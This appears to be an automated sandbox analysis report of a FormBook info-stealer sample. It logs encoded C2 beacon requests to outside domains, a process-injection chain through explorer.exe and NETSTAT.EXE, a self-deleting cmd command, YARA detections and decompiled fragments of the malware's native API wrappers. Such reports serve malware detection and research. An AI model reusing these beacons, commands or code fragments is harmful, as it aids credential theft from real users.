                                                        Jul 22, 2021 13:15:39.379004002 CEST6113INData Raw: 6f 72 6b 2f 66 6f 6e 74 73 2f 70 72 6f 78 69 6d 61 2d 6e 6f 76 61 2d 6c 69 67 68 74 2f 33 31 41 43 39 36 5f 30 5f 30 2e 77 6f 66 66 22 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 22 29 2c 20 75 72 6c 28 22 2f 2f 63 64 6e 32 2e 65 64 69 74 6d 79 73
                                                        Data Ascii: ork/fonts/proxima-nova-light/31AC96_0_0.woff") format("woff"), url("//cdn2.editmysite.com/components/ui-framew
                                                        Jul 22, 2021 13:15:39.379040956 CEST6115INData Raw: 6f 72 6b 2f 66 6f 6e 74 73 2f 70 72 6f 78 69 6d 61 2d 6e 6f 76 61 2d 6c 69 67 68 74 2f 33 31 41 43 39 36 5f 30 5f 30 2e 74 74 66 22 29 20 66 6f 72 6d 61 74 28 22 74 72 75 65 74 79 70 65 22 29 3b 0a 09 09 7d 0a 0a 09 09 40 66 6f 6e 74 2d 66 61 63
                                                        Data Ascii: ork/fonts/proxima-nova-light/31AC96_0_0.ttf") format("truetype");}@font-face {font-family: 'Proxima Nova';src: url("//cdn2.editmysite.com/components/ui-framework/fonts/proxima-nova-regular/31AC96_1_0.eot");src: url("//cdn2.e
                                                        Jul 22, 2021 13:15:39.379069090 CEST6115INData Raw: 3a 20 30 3b 0a 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b
                                                        Data Ascii: : 0;box-sizing: border-box;text-align: center;background-color: white;border: 1px solid #D4D4D
                                                        Jul 22, 2021 13:15:39.379138947 CEST6116INData Raw: 34 3b 0a 09 09 09 68 65 69 67 68 74 3a 20 33 33 35 70 78 3b 0a 09 09 09 77 69 64 74 68 3a 20 34 38 34 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 30 25 3b 0a 09 09 09 2d 77
                                                        Data Ascii: 4;height: 335px;width: 484px;margin: 0 auto;margin-top: 10%;-webkit-box-shadow: 0px 0px 41px -8px rgba(237,234,237,1);-moz-box-shadow: 0px 0px 41px -8px rgba(237,234,237,1);box-shadow: 0px 0px 41px -8px rgba(237,234


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        3192.168.2.449768184.168.131.24180C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 22, 2021 13:15:44.676069021 CEST6117OUTGET /4nn8/?Hdydvr=pWFD+tLrYKeToD1KMEgTTE+DlvT9wYkFe5dsU0F7Fzakf2kv+MLtj4lbMtCDbvpgbO1m&kXL=IR8x3xdhtDZDo HTTP/1.1
                                                        Host: www.iafzal.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Jul 22, 2021 13:15:44.885785103 CEST6118INHTTP/1.1 302 Found
                                                        Server: nginx/1.16.1
                                                        Date: Thu, 22 Jul 2021 11:15:44 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Location: https://afternic.com/forsale/iafzal.com?utm_source=TDFS&utm_medium=sn_affiliate_click&utm_campaign=TDFS_GoDaddy_DLS&traffic_type=TDFS&traffic_id=GoDaddy_DLS
                                                        Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        4192.168.2.449769104.143.9.21180C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 22, 2021 13:15:50.171391964 CEST6120OUTGET /4nn8/?Hdydvr=6ZiyAD0WbsnILW9skshccJUQJZ00spGUaUUFMt7jIZhEEaQshTVA3pGkMLGohXGeqNyo&kXL=IR8x3xdhtDZDo HTTP/1.1
                                                        Host: www.nirvananaturalcbd.net
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Jul 22, 2021 13:15:50.310985088 CEST6121INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Thu, 22 Jul 2021 11:15:50 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAMLl0RJYcDS0N2xIgi01rOAcEtvCUTUq+IuNz5PA8eXYsfPLRkgnNehO+NbOZAlLoQnSpB5rXuRxRCTF+T1iU9sCAwEAAQ==_FzrU0O/DzPHwhUHqvo1zsrZd6OYhY/CKmMbfkIpM4HkqpULVsnDaZNpBRyCVeu0ugpO2Xos2NXdjGtQoX27wGQ==
                                                        Data Raw: 33 31 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4d 4c 6c 30 52 4a 59 63 44 53 30 4e 32 78 49 67 69 30 31 72 4f 41 63 45 74 76 43 55 54 55 71 2b 49 75 4e 7a 35 50 41 38 65 58 59 73 66 50 4c 52 6b 67 6e 4e 65 68 4f 2b 4e 62 4f 5a 41 6c 4c 6f 51 6e 53 70 42 35 72 58 75 52 78 52 43 54 46 2b 54 31 69 55 39 73 43 41 77 45 41 41 51 3d 3d 5f 46 7a 72 55 30 4f 2f 44 7a 50 48 77 68 55 48 71 76 6f 31 7a 73 72 5a 64 36 4f 59 68 59 2f 43 4b 6d 4d 62 66 6b 49 70 4d 34 48 6b 71 70 55 4c 56 73 6e 44 61 5a 4e 70 42 52 79 43 56 65 75 30 75 67 70 4f 32 58 6f 73 32 4e 58 64 6a 47 74 51 6f 58 32 37 77 47 51 3d 3d 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 6e 69 72 76 61 6e 61 6e 61 74 75 72 61 6c 63 62 64 2e 6e 65 74 20 61 74 20 44 69 72 65 63 74 6e 69 63 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 69 66 72 61 6d 65 20 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 7d 0a 68 74 6d 6c 2c 20 64 69 76 20 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 7d 0a 62 6f 64 79 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 20 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 30 35 30 30 30 35 2e 76 6f 6f 64 6f 6f 2e 63 6f 6d 2f 6a 73 2f 70 61 72 74 6e 65 72 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 319<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAMLl0RJYcDS0N2xIgi01rOAcEtvCUTUq+IuNz5PA8eXYsfPLRkgnNehO+NbOZAlLoQnSpB5rXuRxRCTF+T1iU9sCAwEAAQ==_FzrU0O/DzPHwhUHqvo1zsrZd6OYhY/CKmMbfkIpM4HkqpULVsnDaZNpBRyCVeu0ugpO2Xos2NXdjGtQoX27wGQ=="><head><title>nirvananaturalcbd.net at Directnic</title><style>html, body, iframe {margin:0;padding:0;border:0;font-weight:inherit;font-style:inherit;font-size:100%;font-family:inherit;vertical-align:baseline;}html, div {height:100%;}body{line-height:1.5;height:100%;}</style></head><body><div id="partner" ></div><script type="text/javascript" language="JavaScript" src="http://050005.voodoo.com/js/partner.js"></script></body></html>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        5192.168.2.44977046.137.146.5580C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 22, 2021 13:15:55.499026060 CEST6122OUTGET /4nn8/?Hdydvr=ihdw70LkX5hxMDN4QIP96+3/t6llBoRk+wXl03wrkyTNzP4vjM3xTua4b/vQ4JbV31Pi&kXL=IR8x3xdhtDZDo HTTP/1.1
                                                        Host: www.updates-app.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Jul 22, 2021 13:15:55.577905893 CEST6123INHTTP/1.1 301 Moved Permanently
                                                        Connection: close
                                                        Server: gunicorn/20.0.4
                                                        Date: Thu, 22 Jul 2021 11:15:55 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Location: https://www.updates-app.com/4nn8/?Hdydvr=ihdw70LkX5hxMDN4QIP96+3/t6llBoRk+wXl03wrkyTNzP4vjM3xTua4b/vQ4JbV31Pi&kXL=IR8x3xdhtDZDo
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Length: 0
                                                        Vary: Accept-Language, Origin
                                                        Content-Language: es-es
                                                        X-Protected-By: Sqreen
                                                        Via: 1.1 vegur


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        6192.168.2.449771184.168.131.24180C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Jul 22, 2021 13:16:00.847594023 CEST6124OUTGET /4nn8/?Hdydvr=sThjVoDGnNhVVqPbc3peDf/Cra5DhNXbrYT0A91inWiDGnxFPUQSzdJbzNWXTwBKB+6K&kXL=IR8x3xdhtDZDo HTTP/1.1
                                                        Host: www.fbgroupsmadesimple.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Jul 22, 2021 13:16:01.085139990 CEST6124INHTTP/1.1 302 Found
                                                        Server: nginx/1.16.1
                                                        Date: Thu, 22 Jul 2021 11:16:01 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Location: https://afternic.com/forsale/fbgroupsmadesimple.com?utm_source=TDFS&utm_medium=sn_affiliate_click&utm_campaign=TDFS_GoDaddy_DLS&traffic_type=TDFS&traffic_id=GoDaddy_DLS
                                                        Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Code Manipulations

                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        Analysis Process: NQBNpLezqZKv1P4.exe PID: 6940 Parent PID: 6036

                                                        General

                                                        Start time:13:13:53
                                                        Start date:22/07/2021
                                                        Path:C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:'C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe'
                                                        Imagebase:0x100000
                                                        File size:714240 bytes
                                                        MD5 hash:F03BF8D3ECC2AE4B40F836C59AC09BDF
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:.Net C# or VB.NET
                                                        Reputation:low

                                                        Chronological Activities

                                                        Analysis Process: NQBNpLezqZKv1P4.exe PID: 3984 Parent PID: 6940

                                                        General

                                                        Start time:13:14:21
                                                        Start date:22/07/2021
                                                        Path:C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe
                                                        Imagebase:0x490000
                                                        File size:714240 bytes
                                                        MD5 hash:F03BF8D3ECC2AE4B40F836C59AC09BDF
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.771627554.00000000009D0000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.771627554.00000000009D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.771627554.00000000009D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.772293876.0000000000AE0000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.772293876.0000000000AE0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.772293876.0000000000AE0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:low

                                                        Chronological Activities

                                                        Analysis Process: explorer.exe PID: 3424 Parent PID: 3984

                                                        General

                                                        Start time:13:14:23
                                                        Start date:22/07/2021
                                                        Path:C:\Windows\explorer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Explorer.EXE
                                                        Imagebase:0x7ff6fee60000
                                                        File size:3933184 bytes
                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Chronological Activities

                                                        Analysis Process: NETSTAT.EXE PID: 7056 Parent PID: 3424

                                                        General

                                                        Start time:13:14:52
                                                        Start date:22/07/2021
                                                        Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                                        Imagebase:0xbb0000
                                                        File size:32768 bytes
                                                        MD5 hash:4E20FF629119A809BC0E7EE2D18A7FDB
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.902873403.0000000002F40000.00000004.00000001.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.902873403.0000000002F40000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.902873403.0000000002F40000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:moderate

                                                        Chronological Activities

                                                        Analysis Process: cmd.exe PID: 7012 Parent PID: 7056

                                                        General

                                                        Start time:13:14:57
                                                        Start date:22/07/2021
                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:/c del 'C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe'
                                                        Imagebase:0x11d0000
                                                        File size:232960 bytes
                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Chronological Activities

                                                        Analysis Process: conhost.exe PID: 6324 Parent PID: 7012

                                                        General

                                                        Start time:13:14:57
                                                        Start date:22/07/2021
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff724c50000
                                                        File size:625664 bytes
                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Chronological Activities

                                                        Disassembly

                                                        Code Analysis

                                                        Reset < >

                                                          Analysis Process: NQBNpLezqZKv1P4.exe PID: 3984 Parent PID: 6940 NQBNpLezqZKv1P4.exeCOMMON

                                                          Executed Functions

                                                          Function 00418260, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 37%
                                                          			E00418260(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418DB0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d42
				_t12 =  &_a8; // 0x413d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                                          0x00418263
                                                          0x0041826f
                                                          0x00418277
                                                          0x00418282
                                                          0x0041829d
                                                          0x004182a5
                                                          0x004182a9

                                                          APIs
                                                          • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID: B=A$B=A
                                                          • API String ID: 2738559852-2767357659
                                                          • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                          • Instruction ID: 36fb0ef1660234b95adbc5e615de389476f61a426637268b67c73261640a8fd9
                                                          • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                          • Instruction Fuzzy Hash: 2AF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00409B10, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00409B10(void* __ebx, void* __esi, void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t32;
				void* _t33;
				void* _t34;

				_v8 =  &_v536;
				_t15 = E0041AB40(__esi,  &_v12, 0x104, _a8);
				_t33 = _t32 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041AF60(__eflags, _v8);
					_t34 = _t33 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B1E0(__ebx,  &_v12, 0);
						_t34 = _t34 + 8;
					}
					_t18 = E004192F0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                          0x00409b2c
                                                          0x00409b2f
                                                          0x00409b34
                                                          0x00409b39
                                                          0x00409b43
                                                          0x00409b48
                                                          0x00409b4b
                                                          0x00409b4d
                                                          0x00409b55
                                                          0x00409b5a
                                                          0x00409b5a
                                                          0x00409b61
                                                          0x00409b69
                                                          0x00409b6c
                                                          0x00409b6e
                                                          0x00409b82
                                                          0x00000000
                                                          0x00409b84
                                                          0x00409b8a
                                                          0x00409b3e
                                                          0x00409b3e
                                                          0x00409b3e

                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B82
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                          • Instruction ID: 046ff59bb8e44ad8641c0e43070f5aeaf3db9792b4ffc4f87dfb9ba9f6fb7e9c
                                                          • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                          • Instruction Fuzzy Hash: D70112B5D4010DB7DF10EAE5DC42FDEB378AB54318F1041A5E908A7281F635EB54C795
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004181AC, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E004181AC(void* __eax, void* __ebx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				intOrPtr* _t19;
				long _t24;
				void* _t35;

				_t18 = _a4;
				_t4 = _t18 + 0xc40; // 0xc40
				_t19 = E00418DB0(_t35, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				 *_t19 =  *_t19 + _t19;
				_t24 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t24;
			}






                                                          0x004181b3
                                                          0x004181bf
                                                          0x004181c7
                                                          0x004181ca
                                                          0x004181fd
                                                          0x00418201

                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 04002387a641ec791a379b22e49a8a2ebd4a24ebfb8764249e6d205454fc329c
                                                          • Instruction ID: 53457ade02f694e5d0257f5edb2ce471dc993c883d584fe777dfbe410a480cdd
                                                          • Opcode Fuzzy Hash: 04002387a641ec791a379b22e49a8a2ebd4a24ebfb8764249e6d205454fc329c
                                                          • Instruction Fuzzy Hash: A701BDB2200108AFCB48CF98DC85EEB77A9AF8C354F158248FA1DD7241DA30E851CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004181B0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E004181B0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				intOrPtr* _t16;
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				_t16 = E00418DB0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				 *_t16 =  *_t16 + _t16;
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}






                                                          0x004181bf
                                                          0x004181c7
                                                          0x004181ca
                                                          0x004181fd
                                                          0x00418201

                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                          • Instruction ID: 1505d2c2fac7169f29cf6ab97caa2a59105c471fc85729d0552dd22f4c6ed161
                                                          • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                          • Instruction Fuzzy Hash: D7F0B6B2200208ABCB48CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00418202, Relevance: 1.5, APIs: 1, Instructions: 38filenativeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 29%
                                                          			E00418202(intOrPtr* __eax, void* __edi, void* __eflags, HANDLE* _a12, long _a16, struct _EXCEPTION_RECORD _a20, struct _ERESOURCE_LITE _a24, struct _GUID _a28, long _a32, long _a36, long _a40, long _a44, void* _a48, long _a52) {
				void* __ebp;
				long _t29;

				if(__eflags != 0) {
					 *__eax =  *__eax + __eax;
					_t29 = NtCreateFile(_a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48, _a52); // executed
					return _t29;
				} else {
					__edi = __edi |  *__eax;
					asm("aas");
					_pop(__esi);
					asm("stosb");
					__esi = __esi - 1;
					__eflags = __esi;
					__ebp = __esp;
					__eax = _a12;
					__esi =  &(_a12[0x311]);
					__eax = E00418DB0(__edi, __eax, __esi, __eax[4], 0, 0x29);
					_t15 =  &_a48; // 0x4138ea
					__eax = _a44;
					__eax = _a32;
					__eax = _a20;
					__eax =  *( *__esi)(_a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44,  *_t15, __esi, __ebp);
					_pop(__esi);
					_pop(__ebp);
					return _a20;
				}
			}





                                                          0x00418203
                                                          0x004181ca
                                                          0x004181fd
                                                          0x00418201
                                                          0x00418205
                                                          0x00418205
                                                          0x0041820a
                                                          0x0041820d
                                                          0x0041820e
                                                          0x0041820f
                                                          0x0041820f
                                                          0x00418211
                                                          0x00418213
                                                          0x0041821f
                                                          0x00418227
                                                          0x0041822c
                                                          0x0041822f
                                                          0x0041823d
                                                          0x00418249
                                                          0x00418255
                                                          0x00418257
                                                          0x00418258
                                                          0x00418259
                                                          0x00418259

                                                          APIs
